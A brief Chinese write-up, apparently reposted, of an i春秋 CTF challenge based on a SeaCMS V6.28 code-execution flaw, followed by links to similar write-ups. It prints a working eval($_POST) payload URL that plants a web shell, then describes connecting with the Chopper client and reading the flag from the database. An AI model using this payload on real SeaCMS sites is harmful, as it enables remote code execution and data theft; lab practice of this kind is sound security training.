题目在i春秋ctf训练营
又是一道cms的通用漏洞的题,直接去百度查看通用漏洞
这里我使用的是以下这个漏洞:
海洋CMS V6.28代码执行0day
按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀连接,但乍一看并没有flag.php
反手去查了一下海洋cms的数据库配置文件的存放地址:
出去用菜刀连接数据库
编辑完成后右键数据库管理,可以看到flag了
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。
猜您在找
i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)
“百度杯”CTF比赛 九月场_再见CMS(齐博cms)
“百度杯”CTF比赛 九月场 code
“百度杯”CTF比赛 九月场---123
“百度杯”CTF比赛 九月场_YeserCMS
i春秋CTF-“百度杯”CTF比赛 九月场 XSS平台
ctf web 百度杯”CTF比赛 九月场Upload i春秋
“百度杯”CTF比赛 九月场_Code(PhpStorm)
百度杯”CTF比赛 九月场SQLi ---------i春秋
i春秋——“百度杯”CTF比赛 九月场——123(Apache解析pht,phtml,php3,phps等 php别名)